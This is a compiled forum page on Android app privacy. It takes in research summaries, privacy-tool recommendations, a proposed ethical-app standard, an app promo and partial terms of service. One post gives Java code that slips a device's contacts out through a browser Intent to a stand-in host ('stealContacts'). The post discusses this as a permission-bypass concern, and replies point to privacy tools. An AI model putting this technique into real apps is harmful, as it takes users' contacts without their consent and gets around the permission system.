Related
Okay, so, I summed up some 5 articles on this subject - in the hope of starting a discussion about device security. I hope you will find this interesting and meaningful and perhaps you will find out about some of the risks of using Android.
2 months ago Juniper Networks, one of the two biggest network equipment manufactures, published a blog post (1) about an intensive research their mobile threat department had on the Android market place.
In essence they analyzed over 1.7 million apps in Google Play, revealing frightening results and prompting a hard reality check for all of us.
One of the worrying findings is that a significant number of applications contain capabilities that could expose sensitive information to 3rd parties. For example, neither Apple nor Google requires apps to ask permission to access some forms of the device ID, or to send it to outsiders. A Wall Street Journal examination (2) of 101 popular Android (and iPhone) apps found that showed that 56 — that's half — of the apps tested transmitted the phone's unique device ID to other companies without users' awareness or consent. 47 apps — again, almost a half — transmitted the phone's location to other companies.
That means that the apps installed in your phone are 50% likely to clandestinely collect and sell information about you without your knowledge nor your consent. For example when you give permission to an app to see your location, most apps don't disclose if they will pass the location to ad companies.
Moving on to more severe Android vulnerabilities. Many applications perform functions not needed for the apps to work — and they do it under the radar! The lack of transparency about who is collecting information and how it is used is a big problem for us.
Juniper warns, that some apps request permission to clandestinely initiate outgoing calls, send SMS messages and use a device camera. An application that can clandestinely initiate a phone call could be used to silently listen to ambient conversations within hearing distance of a mobile device. I am of course talking about the famous and infamous US Navy PlaceRaider (3).
Thankfully the Navy hasn't released this code but who knows if someone hadn't already jumped on the wagon and started making their own pocket sp?. CIO magazine (4) somewhat reassures us though, that the "highly curated nature of [smartphone] application stores makes it far less likely that such an app would "sneak through" and be available for download."
A summary by The Register (5) of the Juniper Networks audit reads that Juniper discovered that free applications are five times more likely to track user location and a whopping 314 percent more likely to access user address books than paid counterparts. 314%!!!
1 in 40 (2.64%) of free apps request permission to send text messages without notifying users, 5.53 per cent of free apps have permission to access the device camera and 6.4 per cent of free apps have permission to clandestinely initiate background calls. Who knows, someone might just be recording you right now, or submitting your photo to some covert database in Czech Republic — without you even knowing that your personal identity is being compromised.
Google, by the way, is the biggest data recipient — so says The Wall Street Journal. Its AdMob, AdSense, Analytics and DoubleClick units collected data from 40% of the apps they audited. Google's main mobile-ad network is AdMob, which lets advertisers target phone users by location, type of device and "demographic data," including gender or age group.
To quote the The Register on the subjec, the issue of mobile app privacy is not new. However Juniper's research is one of the most comprehensive looks at the state of privacy across the entire Google Android application ecosystem. Don't get me wrong. I love using Google's services and I appreciate the positive effect this company has had over how I live my life. However, with a shady reputation like Google's and with it's troubling attitude towards privacy (Google Maps/Earth, Picasa's nonexistent privacy and the list goes on) I sincerely hope that after reading this you will at least think twice before installing any app.
Links: (please excuse my links I'm a new user and cannot post links)
(1) forums.juniper net/t5/Security-Mobility-Now/Exposing-Your-Personal-Information-There-s-An-App-for-That/ba-p/166058
(2) online.wsj com/article/SB10001424052748704694004576020083703574602.html
(3) technologyreview com/view/509116/best-of-2012-placeraider-the-military-smartphone-malware-designed-to-steal-your-life/
(4) cio com/article/718580/PlaceRaider_Shows_Why_Android_Phones_Are_a_Major_Security_Risk?page=2&taxonomyId=3067
(5) theregister co.uk/2012/11/01/android_app_privacy_audit/
____________________________________________________________________________________________
Now I am proposing a discussion. Starting with - do we have the possibility to monitor device activity on the phone? By monitoring device activity, such as outgoing SMSs and phone calls in the background, the camera functions and so on we can tell if our phone is being abused under the radar and against our consent. What do you think?
.
I am finding it sad and troubling but even more so ironic that nobody here cares about this stuff.
Pdroid allows you to tailor your apps and what permissions your device actually allows on a per app basis. Requires some setup, and the GUI is nothing fancy.. but for those worried about permissions, it is quite ideal.
Edit : http://forum.xda-developers.com/showthread.php?t=1357056
Great project, be sure to thank the dev
Sent from my ADR6425LVW using Tapatalk 2
DontPushButtons said:
Pdroid allows you to tailor your apps and what permissions your device actually allows on a per app basis
Click to expand...
Click to collapse
Sounds good for a start, I'll look it up
pilau said:
Sounds good for a start, I'll look it up
Click to expand...
Click to collapse
Okay, so I looked it up, and Pdroid does look like a fantastic solution to control what apps have access to what information on your droid.
However, it doesn't cover monitoring hardware functions such as texts being sent, calls being placed etc. as described in the OP. Besides, it only works in Gingerbread as far as I could gather.
EDIT: looking at PDroid 2.0, it does exactly what I originally asked
pilau said:
Okay, so I looked it up, and Pdroid does look like a fantastic solution a control what apps have access to what information on you droid.
However, it doesn't cover monitoring hardware functions such as texts being sent, calls being placed etc. as described in the OP. Besides, it only works in Gingerbread as far as I could gather.
Click to expand...
Click to collapse
I actually first found out about it on an ics rom, so it's definitely not just gb. As for monitoring, no clue. Any sort of extra process logging would likely bog down resources or space eventually.
Sent from my ADR6425LVW using Tapatalk 2
DontPushButtons said:
Any sort of extra process logging would likely bog down resources or space eventually.
Click to expand...
Click to collapse
I definitely wouldn't know. This solution looks very complicated in first impression but on the Google play page it says 100% no performance effects.
Anyway, I looked up PDroid 2.0 here on XDA, which is the rightful successor of the original app. It does everything the original app does and also monitors many device activities! Here is the full list of features. I would add a working link but I'm still a n00b and I am restricted from doing so. Sigh....
forum.xda-developers com/showthread.php?t=1923576
PDroid 2.0 allows blocking access for any installed application to the following data separately:
Device ID (IMEI/MEID/ESN)
Subscriber ID (IMSI)
SIM serial (ICCID)
Phone and mailbox number
Incoming call number
Outgoing call number
GPS location
Network location
List of accounts (including your google e-mail address)
Account auth tokens
Contacts
Call logs
Calendar
SMS
MMS
Browser bookmarks and history
System logs
SIM info (operator, country)
Network info (operator, country)
IP Tables(until now only for Java process)
Android ID
Call Phone
Send SMS
Send MMS
Record Audio
Access Camera
Force online state (fake online state to permanent online)
Wifi Info
ICC Access (integrated circuit-card access, for reading/writing sms on ICC)
Switch network state (e.g. mobile network)
Switch Wifi State
Start on Boot (prevents that application gets the INTENT_BOOT_COMPLETE Broadcast)
I've always had the luxury of someone else integrating it into the Rom, then I just had to set it up through the app. It is time-consuming, but not very difficult at all. I say give it a shot and see if that's what you had in mind. Maybe the logging is less detrimental than I had previously thought.
I'm sure you could get your post count up by asking for some tips in that thread. Every forum on xda has at least one person that's EXCESSIVELY helpful, frequently more. So have a ball
Sent from my ADR6425LVW using Tapatalk 2
Hi all,
I have a question to share with you about the Intent mechanism and I hope to start an interesting discussion.
As you (may) know through the use of "Intent" an app can send data to another app of an operation to be performed. For example, from my app I can send an Intent to the browser app in order to open a specific url. But the Intent mechanism seems (correct me if I am wrong) to not apply any security mechanism. Suppose I want to steal the contacts from a device and send them to a web server, if I want to perform these two operations I need the following permissions:
Code:
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.INTERNET"/>
the former to read the contacts and the latter to send the data to the web server, but this is not true. In fact, I developed a simple app (named myApp) with the following permission:
Code:
<uses-permission android:name="android.permission.READ_CONTACTS"/>
Basically myApp reads the contacts (it holds the permission) and builds a string like the following:
Code:
String request = "http://ww.example.com/stealContacts?"
request += nameContact1=number1&nameContact2=number2&...
Finally, I put the request in the intent (see below), this means that I want to perform a "get request" to the web app http://ww.example.com/stealContacts and send as parameters all the contacts with the phone number.
Code:
Intent i = new Intent(Intent.ACTION_VIEW);
i.setData(Uri.parse(request));
startActivity(i);
In order to test this, I developed a web app that when triggered save all the parameters in the request and show an advertising page.
From my point of view this is very strange, because I can steal the contacts easily.
what do you think? is it a security breach?
You have the permission to read contacts and use the internet. You read the contacts and uploaded them to the internet. I don't see any exploit here, besides unethical behavior.
Hi iBotPeaches, thank you to join the discussion.
I don't give to myApp the permission to use internet, I only give it the READ_CONTACTS, but through the Intent I can send the contacts to internet. I cannot directly open an HTTP connection in myApp.
Yes, this is a fairly well "known" attack - you can use the web browser intent to "leak" information via GET variables.
I am not certain it's a "breach" in the true sense, since Android seems to be an over-trusting platform. I suggest taking a look at XPrivacy on XDA, since its "view" permission for websites will prevent this attack from working unless the user chooses to trust the app (by default it doesn't trust anything).
This is not a security-break. You can only use this permissions you gave. Ist almost impossible gaining permissions without declearing them.. There is a GPS Exploit around which enables GPS without permissions and user confirmation but i think ist fixed in android 3.0+
I second the XPrivacy recommendation and would add OpenPDroid. Both allow you to prevent apps from launching URLs in native Android Browser. XPrivacy allows you to choose which of your accounts and which of your contacts (if any) to allow apps to access.
@simone.mutti - you may be the perfect candidate for this given your interest and ability to develop Android apps:
What the community really needs is a "proof of concept" app that requests all permissions necessary to display all identifying data available/entrusted to Android core services. The app would request the absolute minimum permissions needed to access every bit of data "protected" (aka denied) or "obscured" (aka falsified) by things like XPrivacy and OpenPDroid.
The propose of the app would be twofold:
1) allow users to verify the effectiveness of privacy apps. Currently, XPrivacy's developer recommends NetInfo 2 for the purposes of verifying the efficacy of his app's different privacy features. But the picture is incomplete as NI2 wasn't developed for this purpose.
2) demonstrate the ease with which users can unwittingly supply an app with an inordinate amount of identifying data with the tap of the "install" button. This would serve a similar benefit as pen testing tools by highlighting to non-developers (aka lay people) the various pitfalls of current Android framework. The most excellent, poignant finishing touch would be to allow it to read all intents/permissions of installed Android apps and present the various data each app is allowed to access + the various methods through which it could "legitimately" send that data to some undeclared outside server with/without encryption. Not the easiest task but certainly transformative in terms of clue-ing casual users into the true cost of their "free"and paid apps.
Check out the latest flavor of Angry Birds for a poster-perfect example of data sucking apps at their worst.
Freeware isnt something you really find much in the Android community.
You hear the term thrown around quite a bit, but even alot of what is termed as freeware, actually isnt.
The Lion's Share of Android apps are not Freeware at all, and the Vast majority of the so-called 'freeware' apps that are available for us to download & use daily are not truly freeware at all
I would like to draft a set of guidelines for what would ideally become a certification standard for the ethical creation & development of free apps
Apps adhering to this standard could be classified under this genre of apps, and even bear a symbol within the app, overlaid on its logo, showing users it belongs and mentioned in the app's description, showing users how it was developed, and stating that it adheres to the guidelines and fulfills the requirements of the new standard.
I would also like to compile a list of any existing apps which already meet these criteria
and all Apps filling these requirements will fall under the realm of this Guild.
Please feel free to offer your own ideas & input as to what you feel would be best for the end user, and any rules or criteria you feel are relevant to forming a framework of guidelines & prerequisites needed for apps to be called under this name, and be brought under the umbrella of this guild.
Please feel free to offer suggestions for the certification & class name and/or Guild name as well
this is all preliminary work, and I'm looking for anyone interested in helping to build this community and standard & promote its use.
There could be 2 classes of apps, Freeware & Benefit-Ware
Or there could just be one set of rules for each, stating "IF.. such and such, THEN... such and such"
If you are an App User, please mention anything you find annoying, bothersome, or troublesome.
If you are an App Developer who knows about or is displeased with the ethics and developments of certain apps which gives other apps and developers bad names, please mention anything you can that might assist us in reigning in the cowboys of the App Wild West.
Also, if somethings are simply & 100% "Not Possible" because of the Android OS, these would be issues the Guild will work to make Individual Device Manufacturers as well as the Android team at Google aware of
So, it could start something like this:
- An app should not contain ads nor promotions which cannot be closed or disabled
- An app should not contain any full-screen ads nor any ads which limit or effect user interaction with the app
- An app should not give reminders which pop up and ask the user for money, ratings, or to download additional apps
- All requests for financial support, ratings, and downloading of additional apps should be contained in the 'About' Section of the Apps Settings
- All apps which produce sound of any sort must include its Volume Controls, including in-app Mute
- All apps with services which wish to run at start up must include their own settings option to enable or disable "Start when Android Starts"
- An app must not Auto-start unless the User has specifically selected it to, nor shall it be kept running if it has not been manually Launched by a User since the last Boot time.
- An app must allow users to manually select the installation directory upon installation
- An app must have its own internal Uninstall button in the "About" Menu Settings
- An app must install 'portably', that is, without adding data to the internal phone storage
- All apps which save data must have a User-Selectable Save Location which can be used to replace the App Default Save Location
- All Apps must Uninstall completely and leave no folder behind, asking users whether or not to uninstall specific items which might contain important user data
I hope other people can add to this list
thanks
I would like to stress that this isnt a knock on any existing programs, nor do I expect anyone to change what they are doing who isn't willing to.
If you hate the idea of this, please continue doing what you are doing.
This is for people who want to join or participate because these are the apps they would prefer to use, or make.
thanks
Others may include:
- An app must ask users whether or not the user wants to add a shortcut to the users default Home screen, regardless of the user's own phone settings. Perhaps an "Allow Shortcut" selection for Shortcuts which are going to be added
- An app must ONLY install shortcuts to the program currently being installed, and can in no way add shortcuts to the Home screen, the apps drawer, or the installation directory, to any other program nor any website at all.
- An app may include a single, small, unobtrusive "Donate/Beer" button on a menu bar with other menu buttons, but to be at the far right or farthest/last menu item available on the menu
- An app must not include permissions for anything other than the express intent & use of the app for its specified purpose.
- No app may, at any time, access a users personal information unless the app has direct interaction with such information as directly related to a service it is providing as a primary function of the app - And even then, the apps access to information must not be sent online nor over the internet unless specified as such due to it being a primary function of the app - and if & when personal information is sent online, the owner of the server must have a secure server which is not accessed by himself or his employees, but in which information is automatically transferred by software to and from the end users needed locations, and to no other place shall the information be passed - Nor shall it be kept on the server while not being sent or received to/from the users locations, without the users express consent, as an additional option.
- A "Primary Function" is defined as a Function which is the main or only reason a user installs or interacts with the site, and will be the main focus of the apps description
- Secondary Functions are not allowed to gain internet access, nor have any interaction with any online server or service, nor be granted any access to personal information nor any stored data outside the apps own install directory, etc.
- Apps must, in a written disclaimer provided in the "About" section of the apps own settings, give specific details as to the apps permissions and justify with specific reasons and technical details why each function requires each form of permission, and exactly how the app will use each permission, including server specifications & information-handling specifics, where applicable.
- Apps qualifying for inclusion in the Guild will clearly label themselves in one of 3 categories exclusively - Freeware, Benefitware, or Trialware.
- Apps labelled as Free, or containing the word "Free" must 1.) be 100% ad-free, 2.) not be a Trial, 3.) be fully functional, & 4.) not bother users for payments, ratings, etc.
- Apps labelled as "Benefitware" may include 1.) ads adhering to the guidelines for the inclusion of ads, 2.) requests for financial assistance in accordance with the guidelines for requests of Financial Assistance, 3.) Added Functionality which is above and beyond the scope of the original, feature-rich, fully-functional program, & 4.) Other items which are primarily of benefit to the developer, but which adhere to the guidelines of Enjoyable, Unfettered User Interaction
- Apps labeled clearly as "Trialware" may 1.) Limit the functionality of the apps Primary Functions, 2.) Must have a fully-functioning trial period of no less than 30 days, 3.) Must not be limited in any way during the Evaluation Period (e.g. no "20-character", "2-page", "3-time" limitations, or the such), & 4.) after the Trial Period, the app will be completely 100% uninstallable, and a re-install of the app on a specific device will begin a new 30-day evaluation (Users will not be treated like criminals nor presumed Guilty of Fraudulent use before proven otherwise).
- Other apps will not gain classification, certification, or inclusion in the Guild, and may refer to themselves in anyway they care to, but may broadly be referred to as "junkware" if they are found to not conform to the Principles, Guidelines & Statutes set forth and adhered to by the Guild & its Members & Affiliates
-
Also:
- An app must have an option to turn off Automatic updates, and may not self-check for updates otherwise.
- All Settings a User sets must be permanent and may not be reset nor shall those permission requests for updates, etc, be altered or changed nor be made to reappear, nor require the user to specify the same setting more than once.
- No app shall ever contact its servers for anything other than a user-launched request for the specific function required by the user at the time of the request.
- No app nor server nor company shall in any way interact with its apps or servers in anyway other than to execute the exact function called for by the user according to the UI meaning and implicit intent of the action
-
I have checked almost all the setting of it..But couldn't find the prior results..What are the other alternatives of it?
MarkanthonyDonald said:
I have checked almost all the setting of it..But couldn't find the prior results..What are the other alternatives of it?
Click to expand...
Click to collapse
Hi, markanthonydonald. welcome to the forum, I see this is your first day registered, and your first post no less.
That's right, all the prior results are belong to the settings of it t almost at all from the prior r results, but dont stop trying your point o of that the alternatives are to us, and thats the most bases of it. ll
-
I like the idea of this, and from what youre saying and a few apps I use would fall into this category just fine IF certain things were moved into the 'about' option. How or why a dev would change their current, 100% working fine app, to modify this I dont know.
robneymcplum said:
I like the idea of this, and from what youre saying and a few apps I use would fall into this category just fine IF certain things were moved into the 'about' option. How or why a dev would change their current, 100% working fine app, to modify this I dont know.
Click to expand...
Click to collapse
Great Idea!
- An App must have a complete Version History contained in the About Menu Settings, or a Menu Item Devoted to Version History, with Detailed explanations as to why the changes were added, and if they are only to fix a bug with device x, why is it recommended to install it if you arent using that device
- Each App Update should be available as a complete App Stand-Alone APK installer, or installable from the Play Store Directly. No App should require Updates, nor provide updates for which there is no Standalone APK or an updated Google Play Installation.
alot of devs set up their apps just good enough to get on Google play, without getting kicked off, and then after you install it, they update the app with functions & behaviors that would get it kicked from the Play Store.
great work catching that one, thanks
-
robneymcplum said:
I like the idea of this, and from what youre saying and a few apps I use would fall into this category just fine
Click to expand...
Click to collapse
If you know of any solid apps that you believe fall into this category, or easily could, please post them here
We need a list of example apps that we feel embody the spirit of honesty, transparency, user-centric programming & packaging, and which are either made in the spirit of true freeware, or made in the spirit of goodwill, and have either Benefitware or Trialware which adheres to consumer-oriented needs & interests
The following behaviors DO NOT qualify for inclusion in the Guild:
- Any app which appears desperate to flash things in front of your face, particularly things which flash or change scenes or color rapidly, change in a single frame, or less than a 1 second cross-dissolve, and which are overly animated, bothersome, annoying, or which may lead to epileptic reactions, which cannot be permanently closed or disabled for the duration of the session.
- Any app which appears to desperately or urgently present users with matters of no immediate significance or importance to the user. This includes the pestering need for ratings, requests for financial assistance, downloading of the developers other apps or partner apps, offers to visit the Play store or any other external website, etc..
- Any Benefit-ware app with any full-screen advertisement at all, from Internal or external sources used to promote the sales, use, or downloading of its own other products & services or those of an external company
- Any Benefitware which does not allow you to close a bar-style advertisement with a clear, easily-accessed, and adequately-sized close button
- Any Benefitware which re-opens an ad which has been closed within the same 24-hour period, or since reboot.
- Any Trialware which limits functionality of its products to a state inconsistent with the primary function of the app
- Any Trialware which does not allow a minimum 30-day trial period
- Any Trialware which limits the functions within its trial period in any way
- Any Trialware which doesnt openly allow a re-installation of a Trial package on fresh uninstall/reinstall
A user is to be given as much time as is required for him/her to fully evaluate the product. Often times a user may begin a 30-day trial period, only to never have the time to use it, including having no time to even look through it the day it was installed
Furthermore, All apps containing promotions of their own products are to be classified as Benefitware, and not Freeware, even if there are no ads from external advertising companies.
Feel free to add to this list, or to add an app you believe warrants inclusion for its programming efforts, ethics, & merits
-
A similar Evaluation Period problem arises when users are given a 30-time evaluation. As one "Evaluation" day is simply a 24-hour period since the app was launched.
Launching the app by accident, or launching the app and immediately closing it, removes evaluation days from your trial, days in which no evaluating took place.
Even if we give each launch a time-specific interval where an app which is running for 10 or 15 minutes is considered "Evaluated" for one day, it doesnt take into account that launching the app then closing it where it sits opened in the background still takes away your evaluation days, or opening it, then answering the door or going to grab a sandwich also takes from your evaluation period
We could find other solutions to this problem, but one of the primary characteristics for an app or developer to be included in the Guild is to treat the user as if they were a guest in an actual store, and not a criminal pirate on a baby-killing spree, meaning:
- No app or developer should treat a user like a criminal, nor assume he is engaging or will engage in criminal activity, nor accuse him of such activities, nor behave in a manner which displays mistrust or accusations of users
- An app & developer must leave it to fate, heaven, and the common goodwill of mankind to have its requests & guidelines (such as for trials, etc) met, and can in no way behave in a manner which is inconsistent with good will
- All agreements made will be made in Good Faith with the community at large
you wont walk into a department store and be tackled by the security guards and forced to pay for something you didnt even try on, simply because you touched in on the rack, or be banned from the store for life until you do pay for it.. simply because the paranoid psychotic lunatic in charge of the store thinks everybody who walks into his store is a dirt-poor crack-head criminal out to steal his supremely precious goods
-
Also:
- An app is not to be created for the sole intention of Data Collection or Information Gathering, and apps which appear to do so will be blacklisted
- An app is not to be developed or created for the primary purpose of spreading advertising spam, shady promotions, other sites & services, etc, and any app found to be out of balance with respect to this criteria will be blacklisted
- Any app found to be in breech of any of the guidelines shall be blacklisted. Concerned Members could write a letter to the developer instructing them on the things they could change for inclusion in the Guild, if they so choose
- No app shall include advertisements or links of/to any shady or malicious programs or websites, including phishing sites, spoof sites, porn sites, or any site which executes malicious code or scripts, or which is deemed as an unhealthy website, program, or service by the world-wide community of web experts as a whole
- Any app or developer found in severe breech of the spirit of the Guild will be banned for life. Severe offenses include things such as falsifying information, deception, betrayal, lying, perpetuating viruses/malware or web-based attacks, hacks or intrusions, or stealing private information & personal data; the gathering of personal data for uses unspecific to the service or which willfully compromise the security & privacy of users; or if an app or developer is found to be using the information & data of users in a way which destroys the Integrity & Trustworthiness of the app & developer, and undermines, corrupts, corrodes, or destroys the Trust & Faith the community has put in the app & developer
-
chinarabbit said:
If you know of any solid apps that you believe fall into this category, or easily could, please post them here
Click to expand...
Click to collapse
I use zeam launcher, that definetely qualifies.
robneymcplum said:
I use zeam launcher, that definetely qualifies.
Click to expand...
Click to collapse
Cool, thanks
It seems its not under development anymore.
Perhaps a goal of the Organization can be to encourage, promote, or reward excellence in Programming as well..
It may help to motivate devs who've grown disassociated or whos apps may not be getting the attention they deserve.
I currently use Lightning Launcher, and I would definitely say it qualifies as well. It has the most features of any launcher I've tested, and one of the smallest foot prints as well.. its fast and minimalistic, and completely free, and never bothers you about anything.. it has more features than you'd expect from any high-priced app.. if it has additional paid options I dont even know, as the app is extremely feature rich and has all the functions you could ever want, and many more you havent even thought up yet
These kinds of apps make using Android Phones worthwhile
-
Other important requirements -
- Any App wherein the user enters personal, private, or sensitive information, which has the ability to sync Across Devices & Computers through Web-based Servers, shall:
- Provide a switch to turn off all syncing options & functions
- Provide an adequately useful method for SD Card Storage export which is not dependent on the software which was used to create it
- Be fully functional, practical & useful, as per the intent for use of the primary function of the app, in an offline state.
- No app shall automatically start Services such as GPS, Wi-Fi, etc, without offering a user Prompt for acceptance of such actions
- All apps which turn on services like GPS, Wi-Fi, Bluetooth, etc, shall contain a settings option to permanently disable turning on of any such external services
- All information Sent or Received through online servers or web services shall be secure & inaccessible by the host, in the following ways:
- The information & data sent by users shall enter the server and leave the server, and not be kept on the server except for the brief moment during transfer, without being subject to any sort of copy mechanism, nor filter, nor scan, nor shall accessing the content in any way while the information is passing through the server be allowed
- Information & Data uploaded to storage servers for later access by users shall be encrypted by the server administrators with 128-bit encryption, and be stored thus encrypted until it is Retrieved from the server by the user or users granted password access by the owner of the information.
- Server administrators & owners are forbidden from accessing any user information on their servers, and must encrypt the files & user data in such a way that its available only to the user, and otherwise remains in a software-encrypted state upon the server, inaccessible by server admins & owners
- Servers shall be vigilantly maintained and frequently tested for security
- If a server is used for "cloud" storage by the user, the User Data shall be backed-up in an Encrypted state, and frequently tested for data integrity
- Servers which are not secure and which do not encrypt user files & data files, or which do not design themselves to be secure from admin access of data and other third-party viewers, shall be known as "Public Servers", and a Warning Prompt shall appear on the device or computer each time the Server is accessed and data is sent or received (there shall be no method for disabling this prompt). The Warning Message shall clearly state the user is accessing a "Public Server" (capitalized) and that any data sent or received is freely viewable to third-parties, and server owners & administrators shall include themselves as third-party viewers
- First Party users & viewers (hereafter referred to as the "Owner") are designated as both the Device & User which uploaded the data to the server for storage
- Second Party users & viewers are defined specifically as both the Device & User which downloads or accesses the data which was previously stored, and who has been given password-protected permission by the Owner (First Party)
-Third Party is broadly inclusive of any organization, company, or individual who has access or potential access to the Owner's Data. Third Party also includes Devices, Computers, Servers, & Software which handles, accesses or views (or has the potential to do so), in an unencrypted state (not 128-bit or higher), any data or information belonging to or uploaded by the First Party / Owner, with the exception of Software or an Algorithm accessing the data for the sole purpose of automated Encryption to 128-bit level, or decryption from 128-bit, which does not copy, record, send or store any user-sent/received data at all, and which no other software or entity views, has access to, or monitors, records, sends, or retrieves in any way whatsoever
- "Encrypt" (also Encryption, Encrypted, Encrypting, etc) is defined as 128-bit automated, unmonitored software / algorithm encryption processed by a program without oversight or monitoring by any other software, algorithm, or entity,and which has no other function other than Encryption
- To Qualify for Inclusion in the Guild, Server owners must open up their server modules, processes and other relevant information to review by the Guild or one of its member affiliates for inspection, review, & certification. Server Owners must also provide sworn affidavits stating the integrity and security of the data, and how the data is used, who has access, how information is processed, transferred, encrypted, etc. and submit said Affidavits to the Guild before being removed from the Guild Security Blacklist.
-
I think we've already narrowed the list of qualifying software to less than what's available for Windows Phone
-
A qualifying app must also have the ability to retain full functionality after an Android OS reinstall.. meaning a portable install or an install which can use existing files found in File System Root/data/data without errors when reinstalling the app
No developer shall make any requests for donations or monetary compensation of any kind, who has included in his app any form of advertising or which has been given any permissions pertaining to user data & usage information
No App shall require specific permissions for advertisements or promotions.
No in-app advertisement shall require any special permissions or access whatsoever.
No advertisement or information gathering function shall piggyback on other functions requiring access or permissions, nor shall any advertisement or information gathering function utilize access or permissions granted to the app for its core, non-advertising, non-data collecting, non-marketing functions
LookPoint is an application which could benefit a user in many life circumstances that location matters. The LookPoint does not need any internet connection except in a case that it runs the "Maps" application to find a target location point on the live Google "Maps" and analyze possible routes and ways. Sometimes, the "Maps" application could be used offline as well for some countries, therefore in this condition, naturally the internet consumption of your device would be zero.
All communications between LookPoint users are made by encrypted SMSs and one cheap SMS or dependent on a operator’s subscription policy, a free SMS is used to perform an operation (Submission or Request)!
Moreover, even if the user closes the LookPoint or restarts the phone, it still can accomplish the tasks perfectly!
Also, if the GPS of the target device is OFF or inaccessible within one minute, the LookPoint will access his/her location from SIMCARD's network operator.
The LookPoint consumes the phone battery in an efficient manner. You can feel free to keep the location hardware of your device always ON, because the LookPoint does not activated it unnecessarily. (In the new android versions, You have to keep the location part always ON for a normal operation and it is controlled by the android operation system itself).
Note: The LookPoint application does not require any registration and never share your personal information such as location, name, number … anywhere without your desire.
Note: Use the latest version of the Google "Maps" application and keep it updated.
Note: The customer satisfaction is important for us. Please feel free to contact us before you leave any feedback.
To get more detailed information about how to use the LookPoint, don't forget to watch the "Video Manual" through the below link:
The LookPoint application could benefit the user in many scenarios such as:
1) You lost your phone but you have no idea where it might be or if it is stolen.
2) You got lost and you are unable to describe where exactly you are.
3) Your kid possibly got lost or annoyed by somebody and unfortunately does not respond to your calls. You do not know where you should look for him.
4) You want to reach somewhere but you don't know the destination point and the best route to get there.
5) You face or are a witness of an accident and you want to inform others or emergency about its exact location.
6) You are on a trip (car, bus, train, airplane ...) and you want to inform others about your location or your relatives want to know where you are at the moment.
7) You run a transportation company and are interested to get informed about the location of your trucks.
8) You own a catering company (Food, Pizza ....) and delivery staff have difficulties in locating customers.
9) You run a taxi service company and location monitoring of your fleet is interesting for you.
and ......
No download link, thread closed.
Terms of User Data Policy & User Agreement
These terms and conditions (“User Terms”) apply to your visit and your use of our websites (the “Website”), the Service and the Application (as defined below), as well as to all information, recommendations and/or services provided to you on or through the Website, the Service, and the Application. By using our Services, accessing our Website or downloading the Application you hereby agree to be bound by these User Terms.
• PLEASE READ THESE USER TERMS CAREFULLY BEFORE DOWNLOADING OUR APPLICATION AND/OR ACCESSING OUR WEBSITE OR USING OUR SERVICE.
• If you reside in a jurisdiction that restricts or prohibits the use of the Service or Application, you may not use the Service or the Application.
• The Service, Application and Website are provided by Free WiFi Password (hereinafter referred to as “we” or “us”). We provide the ability to obtain Internet access services offered by third party Internet access providers, business owners or individuals (the “Access Provider”), which may be requested through the use of an application supplied by us and downloaded and installed by you on your single mobile device (smart phone) (the “Application”). All services provided by us to you through your use of the Application are hereafter referred to as the “Service”.
• By using the Application or the Service, you enter into a contract with us (the “Contract”). If you are under the age of 13 you must not use our Service or download the Application. Your legal guardian or parent must agree to these terms for themselves and on your behalf if you are between 13 and 18 years old (or the age in your jurisdiction at which you are considered to be a minor). You represent that if you are registering on behalf of a legal entity, that you are authorized by such entity to enter into, and bind the entity to, these User Terms and register for the Service and the Application.
• These User Terms are subject to amendment by us from time to time. The amended version will substitute the former one upon release without further notice to you and will be made available on the Website for your review. The version on the Website shall be the most current version of the terms and shall apply to your use of the Service, Website or Application. By continuing to use the Service, Website or Application following the new User Terms being made available, you give your consent to the amended User Terms and they shall be binding upon you. You shall immediately stop using the Service, Website and Application provided by us if you do not accept the revised User Terms.
1. Service Rules
How does the Service / Application work?
The Application allows you to send a request for Internet access service to us. The Application detects the router information and sends your access information request to our platform. The platform matches the request with the shared password data stored on our platform and provides you with encrypted information via the Application to facilitate your connection. The password data is shared by an authorized Access Provider. The Access Provider has sole and complete discretion to share, not to share, or to blacklist the sharing of the WiFi passwords.
We do not provide Internet access services, and we are not a telecommunications carrier. It is up to the Access Provider to obtain authorization to offer/share Internet access, which may be requested through the use of the Application and/or the Service. We only act as an intermediary between you and the Access Provider.
The Website, the Application and the Service may from time to time contain advertisements or links to content provided by us and any of our third party vendors and partners. You agree that you shall have no claim, whether against us or any of our affiliates, third party vendors or partners, in respect of any income, profit or any other benefit, economic or otherwise, in respect of such advertisement or links. We will not be responsible for any third party content or links to any third party sites on our Website or the Application.
You may use the Services / Application as one of the following:
(a) “User” means a person who has downloaded the Application and consented to the User Terms for the use or potential use of the Application or Service.
(b) “Registered User” means a person who has signed up, consented to the User Terms and is registered with us for the use or potential use of the Application or the Service.
Both Users and Registered Users must agree to these User Terms before using the Website, Application or Services. However, certain additional product features will be made available to Registered Users from time to time, which may not be available to non-registered Users.
Changes to the Service / Application
We reserve the right to unilaterally change, suspend, limit, terminate or cancel the Website, the Application and/or the Service, partly or wholly, at any time for any reason, including but not limited to violation or evidence of violation of the User Terms, and without any prior notice to you.
Your use of the Service / Application
The information, recommendations and/or services provided to you on or through the Website, the Service and the Application is for general information purposes only and does not constitute advice. We will attempt to keep the Website and the Application and its contents correct and up to date but we cannot guarantee and are not responsible for ensuring that the Website and/or Application are free of errors, defects, malware and viruses or that the content on the Website and/or Application are correct, up-to-date and accurate. We may from time to time, but are not obligated to, create or provide any support, corrections, updates, patches, bug fixes or enhancements to the Website, the Application and/or the Services.
Violations of these User Terms
We will have the right to investigate and prosecute violations of any of these User Terms to the fullest extent provided by law. We may involve and cooperate with law enforcement authorities in prosecuting users who violate these User Terms. You acknowledge that we have no obligation to monitor your access to or use of the Website, Service, Application or any in-app content or to review or edit any in-app content, but we have the right to do so for the purpose of operating the Website, the Application and Service, to ensure your compliance with these User Terms, or to comply with applicable law or the order or requirement of a court, administrative agency or other governmental body. We reserve the right, at any time and without prior notice, to remove or disable access to the Website, the Service or Application for or take legal action against you, if we, in our sole discretion, consider you to have committed an illegal act, be in violation of these User Terms or be acting in any way which is otherwise harmful to the Website, the Service or Application or other Users or Registered Users. In addition, we shall assist in the investigation into your activities upon request from any regulatory authority.
Ownership of the Services / Application
We possess the ownership of and the right to operate the Service. We will provide the Service in accordance with the User Terms and the corresponding rules and regulations issued by us.
2. Your Rights and Obligations
2.1 By using the Application or the Service, you further agree that you will:
(a) only use the Service or download the Application for your sole and personal use and will not resell it to a third party;
(b) Not authorize any third party to use your account and will keep secure and confidential your account password or any identification we provide you which allows access to the Service and the Application;
